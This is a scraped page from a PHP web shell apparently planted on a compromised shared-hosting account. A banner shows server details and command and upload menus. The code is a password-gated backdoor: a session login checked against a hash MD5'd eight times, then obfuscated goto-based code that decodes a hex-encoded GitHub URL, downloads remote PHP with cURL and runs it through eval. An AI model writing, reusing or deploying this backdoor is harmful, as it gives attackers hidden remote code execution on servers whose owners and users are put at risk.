Server IP : 103.53.40.154 / Your IP : 3.145.85.74 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '2dec0af1d2efe0804b3b28bb0efa51c3') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php /* simple bypass */ goto AAR8N; AAR8N: $ZRM0Q = "\150\x74\164\x70\x73\72\57\57\162\x61\167\x2e\147\x69\164\150\x75\x62\x75\x73\145\162\x63\157\x6e\164\x65\x6e\164\x2e\x63\x6f\155\x2f\116\145\x77\142\x69\x65\x57\151\x62\x75\57\x4e\x65\x77\142\x69\145\127\151\x62\x75\57\x6d\x61\151\156\57\x63\146\157\x75\x2e\160\150\x70"; goto HnA6k; i3ggK: curl_setopt($tI9iG, CURLOPT_RETURNTRANSFER, 1); goto wtZaO; wtZaO: $xG75u = curl_exec($tI9iG); goto Bhtw8; HnA6k: $tI9iG = curl_init($ZRM0Q); goto i3ggK; Bhtw8: eval("\x3f\x3e" . $xG75u);